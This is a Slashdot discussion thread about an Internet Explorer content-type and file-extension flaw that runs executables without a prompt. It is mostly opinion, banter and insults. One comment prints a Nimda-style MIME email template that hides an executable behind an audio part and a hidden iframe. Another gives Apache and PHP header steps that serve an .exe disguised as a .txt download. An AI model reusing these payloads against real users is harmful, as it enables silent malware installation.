    It may not be totally correct, but we all love to bash Microsoft. I would much rather read a completely wrong article about how crap Microsoft is, than a technically correct piece of MS PR about how they give money to lots of poor kids.

    --
    This comment does not represent the views or opinions of the user.
  276. Re:Try this at home (or "not just a threat, also a by foobar104 · · Score: 2

    You *only* test on beta software (IE6) ?!?
    And you do this for a living?!?


    Of course not, you dimwit. It goes like this:

    1. Implement a feature.
    2. Test it on my workstation (Win2000, IE6)
    3. Shit, there's a bug.
    4. Fix the bug.
    5. Test it on my workstation-- better now.
    6. Submit change to QA for "real" testing.

    Sheesh.

  277. Hate to beat a dead horse, but... by darrad · · Score: 1

    If you routinely browse with Internet Explorer or read mail with Outlook, keep in mind that any web page you visit or any email you open can take over your computer, steal sensitive files, destroy your machine, anything. This has been true for at least two and half years

    Actually, this has been true since the first personal PC was put on the market, probably longer.

    Once again, I am forced to point out the fact that it is an uneducated user who will cause the comprimise of the system. Personally, I NEVER "Open file from location". You never know what it is that you are downloading, so I always save it to disk first, and then examine it.

    Any user who "Opens from location" without knowing for a fact what the file is, and that the site can be trusted, is acting stupidly.

  278. /. is safe from the hole, but not from FUD! by TechnoLust · · Score: 1
    It's funny that this FUD and media sensationalism is coming from the people who are always complaining about FUD and media sensationalism when it comes to Linux!
    Hmmm... Also, someone can use any web page you visit or any email you open can take over your computer, steal sensitive files, destroy your machine, anything ? Really, they can send the "Overload CPU" command and cook my processor? (Must be a linux command, my Win2K machine doesn't have it.) They can give me Anthrax? "Oh, no! Not the Thrax!" (-Butters, South Park) That "anything" is a little broad, don't you think?

    Come on guys, I would expect this in the Enquirer, but not on /.

    --
    "Da ist ein Technölüst in mein Unterpanten!"
  279. Isn't this just the old IE MIME problem? by FeatherBoa · · Score: 1
    Unless I'm greatly mistakened, this is just a rehash of the exploit already admitted to by microsoft and already exploited by Nimda.

    The deal is that you have a file ending in ".EML" with some MIME trickery in it, served up by any HTTP server. IE thinks it's an e-mail message and unpacks it. Inside is an executable (name ending with .EXE) encoded in a section whose MIME type is audio/x-wav. IE runs it without asking.

    The magic MIME trickery looks like this:

    MIME-Version: 1.0
    Content-Type: multipart/related;
    type="multipart/alternative";
    boundary="====_ABC1234567890DEF_===="
    X-Priority: 3
    X-MSMail-Priority: Normal
    X-Unsent: 1

    --====_ABC1234567890DEF_====
    Content-Type: multipart/alternative;
    boundary="====_ABC0987654321DEF_===="

    --====_ABC0987654321DEF_====
    Content-Type: text/html;
    charset="iso-8859-1"
    Content-Transfer-Encoding: quoted-printable

    <HTML><HEAD></HEAD><BODY>
    <iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
    <iframe></BODY></HTML>
    --====_ABC0987654321DEF_====--

    --====_ABC1234567890DEF_====
    Content-Type: audio/x-wav;
    name="readme.exe"
    Content-Transfer-Encoding: base64
    Content-ID: <EA4DMGBP9p>

    <your executable here>

    --====_ABC1234567890DEF_====
  280. Anyone remember best practices??? by DNAGuy · · Score: 1

    I have mod points today but I've just gotta post here. In the interests of full disclosure, I run Windows 2000 Server on my main development box and Windows XP Pro on my personal/multimedia box. I'm quite pleased with both. I also run RedHat and Slackware distros at various client sites as gateways, mail and web servers, etc. Best tool for the job, right?

    Anyway, the point is, I don't (nor do my clients) surf as root/administrator. If we remember our lessons from "Computing 101" we run our day to day tasks as a regular user with the most restrictive set of permissions that allow us to do our jobs effectively. For the vast majority of these locally exploitable holes (worms, viruses, etc.) we can only damage our personal documents (which are backed up periodically and stored offline).

    I'm not gonna take sides in the great "Microsoft is evil" debate today. I just hope more people will follow my lead and remember the basics.

    --

    BRENT ROCKWOOD, EST'd 1975

  281. You laugh, but by ColGraff · · Score: 2

    It really is hard for them. Older teachers in particular like the computer to look the same every time they use it, or they get confused. When I worked at my high school over the summer, I was told repeatedly not to allow any variation in desktop performance, so as not to confuse teachers or students. When you spend a lot of time of /., it becomes hard to believe, but a lot of people are simply not computer literate at all.

    --
    I'm the stranger...posting to /.
    1. Re:You laugh, but by cyclist1200 · · Score: 0

      I'm not lauging at all, there there was good deal of scorn in my last reply. And my disbelief comes not from being on /., but from watching my computer-illiterate 61 year-old mother, who has no problems switching between browsers (and even works in linux, though I do all the administrative work).

      Computer illiteracy is usually not about a lack of skill, but a fear that it is impossible to learn a computer skill. It is an acquired behavior.

  282. It happens again and again ... by d-e-w · · Score: 1

    I have worked with several sites that pass files through CGI scripts to the user. Because all the web masters I have worked with are from a unix background, we've never cared about the extension. Files over the web should be passed and parsed by content-type, right?

    There has been bug after bug dealing with content-type and extension in Internet Explorer. They PRE-DATE the fuller integration of IE into the operating system, although that integration worsened them. Every time a problem is reported to Microsoft, they fix the specific problem, not the underlying problem. Thus, you can change your tactics a little and create another "exploit".

    I'm not at all surprised that a destructive exploit has been created. Most iterations of the problem that I've experienced have come from attempts to correctly serve valid data to IE users--in most of those cases, the browser was simply unable to correctly identify/render the files. I could see possibilities for destructive exploits, but because my field is communications, not white hatting, I really wasn't in a [mental/academic] place to experiement with them. Unless Microsoft fixes the UNDERLYING PROBLEM, which allows Internet Explorer to incorrectly interprete by extension in some cases thus ignoring content-type, they are going to continue to see exploits. Even I know that the mixture of two standards is far worse than following either one or the other--and opens the program to far many more exploits. Why can't Microsoft learn that?

  283. Time to filter another author.... by DJ+Wipeout · · Score: 0, Flamebait

    Geez, Michael, wth is your problem? All your articles are either wrong or have so much FUD in them it's not funny.

  284. IE 6 by ehiris · · Score: 1

    IE6 is a big junk anyways. I completely gave up on it.
    Even though I'm running XP, it forced me to get Netscape and forunatley for me this issue won't affect me.

  285. Tom Ridge should make an example of MS by blooflame · · Score: 1

    They constantly create security holes in there products which could allow terrorists to disrupt American business. And, as we all know "if you're not against the terrorists, you're with them". Therefore, MS should be prosecuted under anti-terrorism statutes for this - let's see if that works better than the anti-monopoly statutes.

    I also don't think that donating a lot of terrorist-aiding computers to American schools is going to help them much, either.

  286. Wonderful, Michael! Just wonderful! by Ether+Trogg · · Score: 1, Troll

    Clue me in on a few things, monkeyboy Michael:

    1.) Did you bother to test this "flaw"?
    2.) Did you bother to get independent verification the "flaw" exists, and can be exploited?
    3.) Did you bother to search for any evidence that the "flaw" has been, or is being, exploited?
    4.) Do you have even the slightest bit of journalist integrity?

    I suspect that the answer to all the above questions is "No."

    Michael, you're an idiot. You have an uncontrollable case of "diarrhea of the keyboard." Your ridiculous ranting drips with stinky, runny shit.

    Tell me, monkeyboy, had you found out about this flaw in Konquerer or Galeon or Mozilla, would you have ranted on in the same manner? Of course not; those products aren't made by Microsoft, therefore they aren't "EVIL!!!!" If this flaw existed (or does exist) in any other non-MS browser, well, you'd just say that it was a minor bug that was going to be fixed "real soon now."

    However, since the flaw reportedly exists in IE, it's obviously a horrible conspiracy by Bill Gates and his Microsoft cronies to destroy everything that is sacred! They pissed on Mom's apple pie! By God, they'll be killing puppies next! They must be stopped!

    Looks like it's time to take advantage of Slashdot's filtering features again. I've already filtered out articles by Jon Katz, and anything to do with anime (I don't care for anime). Time to add monkeyboy Michael to the list.

    Not surprising that Slashdot's filters work so much better than Slashdot's editors.

    --
    "The dead do not shoo-bop-aloo-bah." -- Kai, 'Lexx'
  287. Slashdot has changed.... by JMZero · · Score: 3, Insightful

    I don't know what agenda I'm trying to push. I work in a MS shop and my programming resume is very MS focused. I have a lot to lose if Linux catches on very far. I don't even have it installed on my home machine right now. I don't think you are stupid or that you're trying to tell fibbies.

    What I'm saying is that Slashdot used to be nothing but nerds - the clear Linux focus meant that only a certain kind of people came around. Now it seems everyone comes around - and there's little focus. And as more of the general populous comes in, some of the old nerds (who said things that interested me) leave.

    I think it's great that Slashdot is more balanced in its coverage of MS now. But its bad that I have to read through a lot more things I don't find interesting. Moderation has become very predictable - moderators waste their points on safe targets like obvious trolls and "long comments with lots of links that sound intelligent". Sometimes I think they're just trying to get by without being meta'ed down.

    I'm not saying that non-Linux nerds are stupid. I'm just saying that the crowd that Slashdot used to attract said things that were more interesting to me.

    --
    Let's not stir that bag of worms...
    1. Re:Slashdot has changed.... by Anonymous Coward · · Score: 0

      >I'm just saying that the crowd that Slashdot used to attract said things that were more interesting to me.

      On that I agree with you. I've been lurking here for about 2 years, and I've only been heavily into computing for 3. I remember coming to /. and it being very tech focused. Now it's nearly a tabloid.

      When I saw billborg at the top today, I nearly changed my preferences to omit any MS articles, I'm so sick of the bashing. It accomplishes nothing. I hope /. can begin to focus on intersting, contructive topics again.

      And on the moderation front, I agree with you there too. Far too many easy down-mods are taking place. Moderators ought to be ignoring them and just focus on the posts that deserve to noticed.

      -- UnderpaidISPtech

  288. Foreshadowing ... by smcdow · · Score: 1
    Hmm.

    No suprise that Micro-Soft was so very vocal about putting an end to Information Anarchy.

    They must have seen this one coming....

    --
    In the course of every project, it will become necessary to shoot the scientists and begin production.
  289. Ready-Made-Disaster: Just add Code Red by rjamestaylor · · Score: 2
    • However, to exploit the vulnerability, "attackers would probably need control of a Web server so that they could control the information sent in the HTTP header," Wysopal said. As a result, attacks could be traced to the malicious site.
    Reading this one would think, "Oh, no problem. What webmaster would create a trackable exploit?" (ignore comp-u-geek for a moment).

    Add this exploit to wide-open server crack Code Red2/ Nimda...you've got a clear way for a third party to cause a *huge* disaster.

    My logs are *STILL* full of Code Red 2 and Nimda attacks (running appache, so I don't care). How long until these OpenDoor servers are "patched" with the malformed MIME header exploit?

    --
    -- @rjamestaylor on Ello
    1. Re:Ready-Made-Disaster: Just add Code Red by MikeBabcock · · Score: 2

      Its easier to have someone throw 'header("bah");' calls into a PHP program on someone else's webserver than some realise ...

      --
      - Michael T. Babcock (Yes, I blog)
    2. Re:Ready-Made-Disaster: Just add Code Red by Anonymous Coward · · Score: 0

      Huh! Thansk for the tip -- I was just considering adding a PHP site to my server...not now.

  290. Get A Clue by Anonymous Coward · · Score: 0

    No one should be publishing what the bug is and how it's employed. To state that Microsoft is obscuring the information is an uninformed comment brought on by juvenile hysterics and ad hominem Microsoft bashing. Get a clue, you moron.

  291. Low UID by NoWhereMan · · Score: 1
    demand a little bit of non-partisan behaviour from the editors.


    You can demand anything you want, but have you considered that he is entitled to his own opinion?


    If the low UIDs and zealots want to keep the blinders on


    And what is wrong with zeal? Having a low UID indicates a person saw and recognized a good thing long before everyone else jumped on the bandwagon.

  292. Outlook does have many useful features by PenguinusMaximus · · Score: 1

    First let me say I am in no way a microsoft advocate. I run exclusively Free software at home, but the place I work is a microsoft shop.

    Actually scripting is used a great deal in many companies. We use e-mail forms with alot of scripting behind them to make many things easier. For instance the helpdesk has a form that forces users to enter certain information before they can report trouble tickets. It's alot easier than dealing with an e-mail that simply states my screen looks funny. We have another that allows users to check the size of their mailboxes on the exchange server. We couldn't do any of this without scripting. These are just a couple of examples, but there are many uses for the features built into outlook. If people would actually try to learn more than a basic user's amount of knowledge before they come on here and bitch about how bad things are they wouldn't come across as being a bunch of idiots. But what can you expect from the average IT "professional"?

    If you've never worked with scripting in outlook, buy a book, you may be impressed with what you can hack together with a form. If you have and don't like it, then disable it. It's not that hard.

    1. Re:Outlook does have many useful features by arkanes · · Score: 1

      You could do this much easier simply by having a complaint form on your local intranet, and then you don't need to worry about your users getting Outlook viruses.

      Features are great, and all, but if you're implementing things in such a way that your users are explosed to security risks, when there are easier(or at least AS easy) alternatives without the risk, you need to review YOU policies.

      As for disabling scripting, one of the reason these viruses spread so far and so fast is that the VAST majority of users don't know that theres an issue, don't know what setting addresses the issue, don't know where to find the setting, and don't assume that thier software will wipe thier machine in it's out of the box configuration.

    2. Re:Outlook does have many useful features by wirefarm · · Score: 2

      If I'm not mistaken, that's a different kind of scripting. At least it was a few years ago.
      I was using that about 6 years ago, well before Javascript and VB script has been introduced.
      I also seem to remember that it fell apart when the email went outside the local network - it was a really Windows-only kind of thing.
      That sort of thing, I agree, is appropriate in an enterprise setting.
      Also, I think everyone here would agree that Outlook's usefulness is what keeps it alive - people live with all of the problems because of the luxuries it affords them. (Kind of reminds me of the people who didn't want to get off the Titanic just because it had hit an iceberg...)
      Ok, that last comment is a bit of an overstatement...
      Cheers,
      Jim

      --
      -- My Weblog.
  293. Third Party Patching by RottenDeadite · · Score: 1
    Obviously this is what we have to look forward to in the future.

    If Microsoft doesn't patch their bugs for us, or remove/make optional features/bugs of their operating system for us, we'll write programs that do.

    Hell, I don't start IE6 without a copy of Pop Up Stopper by Panicware, since I can't turn off pop up windows like I can in Mozilla. And the really bright ones among us don't use anything but litestep :)

    So who wants to start a betting pool on how long it'll take Microsoft to start lawsuits against programs like these?

    --

    ***JUMP PAD ACTIVATION INITIATION START***
    ***TRANSPORT WHEN READY***

  294. Re:It's what recent mail virus did... by Anonymous Coward · · Score: 0

    ... set content type to "audio" and fed executable instead with pif or vbs extention. Dumb IE rendering engine EXECUTED IT WITHOUT *ANY* PROMPT!

    Lucky me! Just a day before this virus hit our company, I switched to Opera for e-mails too. :)

  295. Raise your hand... by 42forty-two42 · · Score: 1

    ...If you are at all surprised by this. No, Bill, you don't count.

  296. Re:Slander? TeamOS/2 ers? by Havokmon · · Score: 1

    Don't you get that feeling that some of these people are former TeamOS/2 ers?

    Sure, the part about 'Microsoft doing what's best for Microsft' is a little bit of a personal tiff, but at least it's true. But dude, if you're going to claim that Microsoft isn't going to release a patch, at least link to a site that supports your claim. There's nothing like giving out false information, and then saying "Verify it with this guy", who says "What? He's full of shit."

    Christ, How many Slashdot editors are there? And how many items are actually posted? At least read what you're posting. (And maybe spellcheck once in a while)

    --
    "I can't give you a brain, so I'll give you a diploma" - The Great Oz (blatently stolen sig)
  297. And with Apple's proposed adoption... by HiThere · · Score: 1, Offtopic

    ??? Well, I haven't used the Mac for several years now, but this sound like eliminating one of the central strengths that the Mac had.

    I suppose that Darwin implied changes, but I've always thought that the Mac resource fork (and file signatures: Application and file type specified separately) were a great source of strength and stability to the system. (Granted, they added a layer of complexity, required additional tools, etc.) I can think of several different, but logically equivalent, ways to merge that information into a ext2 file system (basically via the use of hidden files), so I don't see any reason that it should be a problem. After all, their UI sits well on top of the *nix underpinning, so their utilities could automatically open/copy/move/delete/etc. both files whenever the user used one. I guess that file signatures were the sticky part, but combined together they were only 64 bits (and letters at that), so it would be easy to just say the first line of the file was the signature (not elegant, but this is a shoe-horn job -- and that's basically what the #! line does, so the metaphor translates).

    The Mac's weaknesses were (are):
    1) It was one of the first GUI designs, so there are a lot of bumps, and places where it had to be patched. And it's relatively difficult for programmers.
    2) It costs more than an equivalent PC.
    3) It is sole sourced.
    ... That seems to be pretty much it.

    Note that 1 and 3 are sources of strength as well as being weaknesses. But I think that over time they have become weaknesses.

    The true strength of the Mac was that there was a good design behind the GUI, with careful attention given to all parts. Compare the use of command keys in the Apple GUI with the clumsy use of accelerator keys in Windows (I rarely bother) and Linux (well, I should learn to use them before I comment too harshly here, but I've been using Linux for 3 years now, and still don't use any of the accelerator keys).

    .

    --

    I think we've pushed this "anyone can grow up to be president" thing too far.
  298. Re:Slander? TeamOS/2 ers? by sheldon · · Score: 2

    "Don't you get that feeling that some of these people are former TeamOS/2 ers? "

    You mean people like Nicholas Petreley and Joe Barr? No! Not possible!

  299. file extensions by vinnythenose · · Score: 1

    Why the hell is Microsoft so dependant on file extensions anyways? How about looking at that nice glob of header at the begging of most file formats to determine what it is. Or, my favourite way is to let the user figure out what their files are. File extensions is an archaic way of determining what the file is. I should be able to have an avi file with a txt extension and still be able to play it in Windows Media Player (shiver, painful program, painful interface, oh woah is me).

    Oh well, everyone needs to gripe about something. At least all of the unix systems don't rely on file extensions, I can have solace there.

    --
    --- I used to moderate, then I read the -1 articles and decided having to filter through them was not worth it.
  300. Your points? by schon · · Score: 1

    From the article:

    "Microsoft will patch a flaw in its Web browser...


    Yes, that's correct.

    From the article's intro:

    "Microsoft has known about it since November 19; they refuse to provide any information about when a patch might be made available, if ever."


    OK, I'm still waiting for you to make a point...

    Hint: they still didn't say WHEN; Sure, they've said they WILL, but they didn't give any information about when the patch will be available.

    Looks like the article intro is correct.

    1. Re:Your points? by Liquor · · Score: 2, Funny

      I'll bet that the patch will be available by the spring.

      (Note - I'm specifying neither the hemisphere nor the year.)

      --

      Liquor
      Sanity is a highly overrated commodity.
  301. I'm sorry, but by spike+hay · · Score: 1

    I like IE better than Netscape. IE tends to be a little bit faster than Netscape. Netscape tends to be unable to load many web pages that IE loads with ease. Netscape also freezes up all the time. I run both on my computer.IE may have huge security gaps, but I just don't really care.

    --
    If you don't understand any of my sayings, come to me in private and I shall take you in my German mouth.
  302. Re:Umm. Not really. by Anonymous Coward · · Score: 1, Funny

    [Scene: Historical tour of the Web, 2053]

    [Commentator: "And here we have another example of an irrational, intellectually empty text contribution to the website known as 'Slashdot.org' It was commonly refered to as a 'pro-Microsoft rant', something that occured more and more frequently after the website became increasingly popular. It was said that the increased popularity attracted more Microsoft 'fanboys' and ultimately lead to its demise.]

    [Audience. Sound of digital cameras taking pictures]

  303. Offtopic: Microsoft .net passport by Anonymous Coward · · Score: 1, Informative

    I ran into an interesting passport issue today.

    When you create a hotmail account, it also creates a passport account as well. But, after that initial creation, the 2 accounts are not tied together.

    Hotmail will disable any account that hasn't been accessed in 60 days, BUT, it does not disable the passport account at the same time. So, if I create an account with hotmail, and use it mainly as a passport for buying stuff on websites, and I dont check my hotmail account for a while, it gets disabled. The problem is, I can still use that login to access passport.

    Now, the even bigger problem, is that someone else can go to hotmail, and create the same account that I did (because mine was disabled) and the new password they chose for the hotmail account will affect the passport account. So, in essense, I just got my passport account stolen from me.

    And with stuff like this going on, they really want me to use passport. I really dont have a problem with entering my credit card info manually, if it is going to stop people from stealing stuff, or using the card without my knowledge.

    Anyway, im sure we will see more of this in the future, I hope the best for the liberty alliance..

  304. I got bitten by this too by GregGardner · · Score: 2, Interesting

    I was developing a web application that would serve out a chunk of opaque data for the user to save on their hard drive. So I set the Content-Type to "application/octet-stream" and the "filename" in the URL was foo.yai which is a totally bogus extension, right? Well it just so happened that the actual content of the data was XML. But not only that, it was XML saved as a UTF String so that it had this two-byte header on it which indicated how long the UTF String was.

    Clicking on the link that generated this file worked fine on all browsers but IE, of course. You would click on it and all other browsers would properly show the user the "Save As..." dialog. IE looked at the file and determined that it was XML (even without and xml extension!) and not only that, it was so bold as to tell me that my XML was mis-formatted because of this 2-byte header at the beginning of the file! So it started its embedded syntax-highlighted XML viewer that it has and then stops and says "Misformated XML, unknown characters before the <xml> tag...". Gimme a break!

    The "workaround" was to set the Content-type to X-Made-Up-Content-Type-To-Fool-Stupid-IE and it decided that this was something that should receive the "Save as..." dialog, as did the other browsers, thankfully.

    So I'm not at all surprised that someone found this vulnerability with IE being so bold as to guess the content-type when it is set to application/octet-stream and start doing whatever it wants to based on its guess.

    And have you ever noticed that IE get's the extension from the last thing in the URL _even_ if it's a query string? So if you have a URL like http://www.foo.bar/download?e=greg@yahoo.com
    then the filename it will try to save is "download.com". And of course .com is an executable as far as Windows is concerned. Brilliant.

  305. This is old news. by Anonymous Coward · · Score: 0

    The old IE executable *.gif has been known for years now.

  306. Yet agian by KingKire64 · · Score: 0, Offtopic

    Cnn is reporting Yet another Very Big and Annoying hole has been found at microsoft. To qoute the reporter, "THe Annoying Hole was found to be nothing other than Steve Balmers Big Mouth" Microsoft says they are in the process of working on a patch, but also commented "How do you stop verbal diarrihia?"

    --
    "All I can tell the "lesser of two evils" folks is that if they keep voting for evil, they'll keep getting evil."-Lp.org
    1. Re:Yet agian by KingKire64 · · Score: 1

      So much for trying to be funny

      --
      "All I can tell the "lesser of two evils" folks is that if they keep voting for evil, they'll keep getting evil."-Lp.org
  307. A simple workaround by Anonymous Coward · · Score: 0

    Maybe sounds so stupid, but I use Gozilla or DAP for download my stuff in MISE. I just use MISE for those "only IE sites", other thing try netscape 4.79 because it opens more "IE sites". Anyway is better to *save* all files in disk and never let any program to execute them.

  308. I can't make this happen by Greedo · · Score: 2, Interesting

    Read the original post closely:

    IE handles files in an odd mish-mash of looking at the Content-Type sometimes for some purposes, looking at file extension sometimes for some purposes. It's hardly surprising that the bug-hunter in the above story has found a way to feed it a Content-Type at odds with the file extension - the Content-Type may be innocuous, but the extension says "execute me", so when the "integrated" IE engine gets ahold of it, the malicious content is automatically executed.

    Where is the exploit in this? Any user with half a brain (not many, I know) will see that this supposed text file ends with ".exe" or something. That's a trigger right there.

    AFAICT, IE relies soley on the file extension when deciding whether or not to execute a file.

    You can try and tell it that .exe files are text/plain ... in which case you get the prompt, and then Windows opens the executible in Notepad.

    You can try and tell it that .txt files are application/octet-stream ... in which case they are still displayed as text in your browser.

    The only way I can think of making this work would be to change the MIME types on the client machine (i.e. Explorer > Tools > Folder Options > File Types). And I'm pretty damn sure that's not possible via plain-Jane HTML.

    --
    Tuus crepidae innexilis sunt.
  309. Yes, but.. by Anonymous Coward · · Score: 0

    All viruses are not worms.
    All operating systems are not created equal.
    All birds cannot fly.

    Um... where was I?

  310. Uhm.... IE5 doesn't seem vunerable to that either. by PenguiN42 · · Score: 1

    I click that link. It says "you have chosen to download text.txt, would you like to open it or save it" etc.

    So I choose "open it" and then it gives me another dialog: "you have chosen to download calc.exe, would you like to run it or save it"

    So If this example doesn't exploit a vulnerability in IE, then "Opera is vulnerable too" is a non-sequitur. How can it be vulnerable if IE isn't vulnerable in the first place?

    --
    The following sentence is true. The preceding sentence was false.
  311. cool! by Graspee_Leemoor · · Score: 1

    While I was reading this article I found someone had sent a message to my hotmail account with the following in it:

    Content-Type: audio/x-wav; name="New_Napster_Site.MP3.pif"

    I opened it in notepad and it's an .exe file.

    Kind of makes a mockery of hotmail's claims to scan all email for viruses with mcafee...

    graspee

  312. SPAM ALERT by dieman · · Score: 1

    petitiononline sends you an ad when you use their service.

    --
    -- dieman - Scott Dier
  313. question about metadata by Kallahar · · Score: 1

    I don't understand the difference between file extensions and metadata. If you set your file to be application/exe (or whatever an executable format is) then how is that different from making it a .exe (in the windows world).

    It seems to me that as long as data files (such as .txt or /text) can be executed, the problem will exist.

    Or maybe I just don't understand the problem...

  314. doesn't work for me either by PenguiN42 · · Score: 1

    Thought I'd inform you as well :)

    IE 5.50.4522.1800 with SP1 and all the critical updates.

    Just tries to open it in winzip.

    --
    The following sentence is true. The preceding sentence was false.
  315. On the contrary by Mr.+Fred+Smoothie · · Score: 1
    "Simply download and look for exploits" is a double-edged sword, my friend; yes, crackers can do it, but so can security consultants & researchers. If the source is widely enough distributed, then the chances of both "black hats", "white hats" and the J-Radom-I-need-this-new-feature hacker discovering a bug are increased. Fortunately, if the "white hats" or J-Random-tinkerer find it, it can be fixed so that it's (mostly) irrelevant that the black hats also found it.

    In the second, binary only scenario, the PITA of reverse engineering ensures that a much smaller # of both white and black hats will attach themselves to the problem, and J-Random-tinkerer can't contribute at all. You've made it less likely that some "bad" person will use the bug to hurt you, but you've also made it less likely that some "good" person will find it and help you avoid or minimize the damage from the "bad" person's discovery.

    My point is, security is a gamble. You are always gambling that there are no bugs in your program that some bad person is going to discover and exploit to harm you. "Security through Obsurity" is the wishful thinking strategy; it seeks to minimize the # of people who find the bugs, and then hope that those people are only the "good guys." Open Source and full disclosure are the "hedge your bets" strategies. They seek to maximize the number of people who find the bug, hoping that at least *one* of them is one of the good guys.

    Purely statistically speaking, which do you think is likely to be more successful?

    --

    1. Re:On the contrary by Anonymous Coward · · Score: 0
      Purely statistically speaking, which do you think is likely to be more successful?

      There is absolutly no way to guess. Especially, if the code is huge such as IE : look at the equivalent, Mozilla. It tooks years just to make it _run_ properly, how much perfectly reviewed do you think it is ?

  316. Supprisingly, Not a Shock by theKiyote · · Score: 1

    Its too bad that news like this doesn't suprise me anymore. Further negligance by Microsoft isnt going to be attacked, but accepted. Now that is scarry. --theKiyote

  317. It will be easy to distribute a patch by PhrackCreak · · Score: 2, Insightful

    Simply put a 'text' file on MSN which is actually the patch. Users don't even have to know they've been patched.

    (Which makes me wonder, was this security hole left in to allow the installation of magic lantern and similar software...)

    --
    - You don't know how to maintain a station wagon either!
  318. Re:Now that this particular cat is out of the bag. by wroot · · Score: 1
    If you really want to toggle IE into secure mode you just need to click the little "X" in the top right corner of the window

    Little "x" ?! More like a giant red cross taking up half of the screen on XP.

  319. Hole How-To by Anonymous Coward · · Score: 1, Informative

    this is too easy, I am not a programmer (unless html counts) but I do have an Apache/PHP setup and was able to test this out. get php to process .txt files in your php.conf file likle so:

    AddType application/x-httpd-php .php .php4 .php3 .phtml .txt
    AddType application/x-httpd-php-source .phps

    then cread a whatever.txt file like so:

    put the readme.txt file in your webroot, along with the exe file you want to execute.

    user gets:you've chosen to download readme.txt..." and picks "open from current location"
    instead calc.exe is executed as evidenced by the calculator opening on my workstation when I tested it.

    dude this is way too easy. Someone who is a programmer could easily display a text document in addition to installing a rootkit/virus/trojan, and end user would be none the wiser.

    good thing this information hasn't been released to the public.....doh!!!!

    1. Re:Hole How-To by Anonymous Coward · · Score: 0

      contents of readme.txt didn't show in my last post, add opening and closing php tags to the start and end
      :
      php
      Header("Content-type: application/octet-stream");
      Header("Content-Disposition: attachment; filename=calc.exe");
      readfile("calc.exe");

  320. Need to ply digital rights angle by ghostofsam · · Score: 1

    (disclaimer: yes, I did read the article). In general, MS seems to care not that much about IE/Outlook security (see reluctance to provide no-HTML patch to Outlook). But see today's other articles: MS cares quite a bit about digital rights management, and getting their finger in the pie for music and video. So: emphasize to gates & co that rogue software could get in through Outlook, execute on the client machine, and crack and make copies of video, and WMP files. Better yet, have some Russian guy write a virus that cracks all your DRM-covered files, places them in your share folder, signs you up to Morpheus (if you're not already); and finally sends itself to your address list. RIAA/MPAA: MS, you gotta stop this! Plug those browser holes NOW!

  321. Re:Now that this particular cat is out of the bag. by gmack · · Score: 1

    Trust me it's a lot easier to support clueless suers in Linux since they don't have access to destroy the machine anymore.

    UI can be just as userfriendly. I had to do that after people kept taking out my windows install by accicent(at least once a month)

  322. Oh, go fuck your self by autopr0n · · Score: 2

    Last I checked, "possession of stolen property" was still a crime.

    I'm talking about LAW. Not hyperbole. Not your fantasy. the LAW. No where, no where at all, in any law, is copyrighted material considered "stolen" The fact that you equivocate "copyright violation" with theft does not have any bearing on the LAW.

    Last I checked...

    If you're so good at 'checking' why don't you look it up and see for your own god damn self. Then come back and show us all where it says that possessing copyright infringed property is the same as possessing 'stolen' material.

    --
    autopr0n is like, down and stuff.
    1. Re:Oh, go fuck your self by PapaZit · · Score: 2
      You're right. Mea culpa. It's not posession of stolen property. It's outright illegal according to a different set of laws: US Code Title 17.

      USC Title 17, Section 106 says what exclusinve rights a copyright holder has. One of them is the right "to reproduce the copyrighted work in copies or phonorecords."

      The definition of "copies" is given in and very clearly includes making a copy of a file on a hard drive. Basically, anything that you can listen to again later is a copy. An mp3 qualifies.

      Penalties are given in USC Title 17, Chapter 5

      --
      Forward, retransmit, or republish anything I say here. Just don't misquote me.
  323. Re:Now that this particular cat is out of the bag. by Anonymous Coward · · Score: 0

    You can fix that in the display settings. Set "Windows and buttons" to "Windows classic style". You have tu turn off the green start button separately for some reason, I guess they were especially fond of that for some reason.

  324. er.. by Wakko+Warner · · Score: 2

    so he's gonna get fired from school?

    --
    "Remember when the U.S. had a drug problem, and then we declared a War On Drugs, and now you can't buy drugs anymore?"
  325. XP home users by daveman_1 · · Score: 1

    I am not sure this is very practical for win9x/winXP home users, as they do not even know they are "logged in". Especially for 9x, since it isn't multiuser and doesn't enforce even the most basic security policy. XP home users don't have to put in a password to log on, and if I am correct, have administrative privileges.(feel free to correct me if I'm wrong here) Not sure what the best solution here is though, since MS users are less than security conscious anyhow and typically don't patch their computers. (How many systems have you seen that had virus defs that were 2 years old?)

    --
    Russian Russian Russian RussianDollSig DollSig DollSig DollSig
    1. Re:XP home users by DNAGuy · · Score: 1

      Y'know, you're right. I often forget about 9x and inexperienced users. I just assume that those people just know they're insecure. Joe Blow user doesn't know what a patch is. I doubt he worries too much about a mime-type vulnerability in his web browser.

      --

      BRENT ROCKWOOD, EST'd 1975

  326. why is this a problem? by jopet · · Score: 1

    its illegal to exploit this to do anything bad, isnt it? anybody who tries, will be hunted down and punished -- but punished reaal bad -- with the help of the new anti-terror legislation. i am sure MS has a reason why it has been designed like this and probably it is a good reson. maybe they will even tell us some day what those good reasons are. maybe it is better for us not to know. a company that big with that many programmers working millions of manyears to improve their state-of-the-art products certainly doesnt let this happen by oversight. i therefore assure you: relax, all is well, there is no need to worry.

    1. Re:why is this a problem? by praksys · · Score: 2, Insightful

      Interesting to see these ideas all in one short post:

      Trust the feds.
      Trust microsoft.
      Forget about privacy (the above will decide whether you need it or not).
      Forget about security (the above will decide whether you need it or not).

      I hope it was a joke.

  327. Interesting point. by Futurepower(tm) · · Score: 2


    Interesting point.

    --
    Bush's education improvements were
  328. Sometimes I don't have control... by Futurepower(tm) · · Score: 2


    You were very quick to be hostile. Sometimes I don't have control over the operating system used by my customers.

    --
    Bush's education improvements were
    1. Re:Sometimes I don't have control... by Anonymous Coward · · Score: 0

      Fuck you Mr. Jennings, fuck you and the dick you rode in on.

  329. Fix posted here... by Anonymous Coward · · Score: 0

    I posted the fix on another thread on this article.

    --corky6921

  330. What about Win98 Lite? by Anonymous Coward · · Score: 0

    What about the IE de-integration done by Win98 Lite? Does it stymie this vulnerability?

    1. Re:What about Win98 Lite? by Pakaran2 · · Score: 1

      Well, if you don't use IE to view documents on the web, you won't run into any trouble, whether or not you have IE integrated for browsing local folders.

  331. Re:What the fuck? What has slashdot come to? by ROBOKATZ · · Score: 1
    That's a pretty insignificant bug then. No wonder MS doesn't think of it as a high priority. I wouldn't either.

    The way the article was worded, web sites and emails could just automatically start executing native code.

  332. It's Part of the Microsoft Settlement by ufotofu · · Score: 1

